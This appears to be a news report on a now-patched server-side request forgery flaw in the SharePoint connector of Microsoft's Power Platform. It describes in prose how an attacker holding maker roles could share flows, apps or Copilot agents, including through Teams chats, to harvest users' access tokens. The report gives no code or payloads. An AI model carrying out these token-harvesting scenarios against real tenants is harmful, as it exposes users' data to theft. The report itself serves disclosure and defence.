Researchers have disclosed details of a now patched flaw impacting Microsoft Sharepoint which could allow threat actors to harvest users’ credentials to Microsoft’s Power Platform (Power BI, Power Apps, Power Automate, and Power Virtual Agents).
The vulnerability impacts the Microsoft Sharepoint connector on the Power Platform and could allow the attacker to send requests to Microsoft Sharepoint on behalf of a user exposing sensitive data to unauthorised access. It can be exploited across platforms like Power Automate and Power Apps, including Microsoft’s Artificial Intelligence(AI) platforms, Copilot Studio and Copilot 365, giving it a broad scope of potential damage. At its core, the flaw is an instance of Server Side Request Forgery(SSRF) stemming from a functionality within SharePoint called “customer value” which permits an attacker to inject their own URL as part of the flow.
There is, however, a caveat for the successful exploitation of this vulnerability. In order to be able to exploit the vulnerability, the attacker must first gain access to the account of a user with “Environment maker” and “Basic user” roles in the Power Platform. The Environment maker role will allow the attacker to create and share malicious apps and flows and the Basic user role allows them to run apps and interact with resources that they own on the power platform.
Attack Scenarios
An attacker with access to Environment maker role creates a flow for a SharePoint action. He then shares this flow on SharePoint with a low-privilege victim user, resulting in the exposure of their SharePoint JWT access token. With the exposed token, the attacker can send requests outside of the power platform on behalf of the victim user.
The attacker can similarly harvest tokens for other services such as Copilot Studio and Power Apps as well by creating a seemingly benign copilot agent or canvas app.
One way of making users interact with the app or agent is embedding it in a teams chat resulting in a watering hole attack of sorts where the token of every user who interacts with the app or agent can be harvested by the attacker.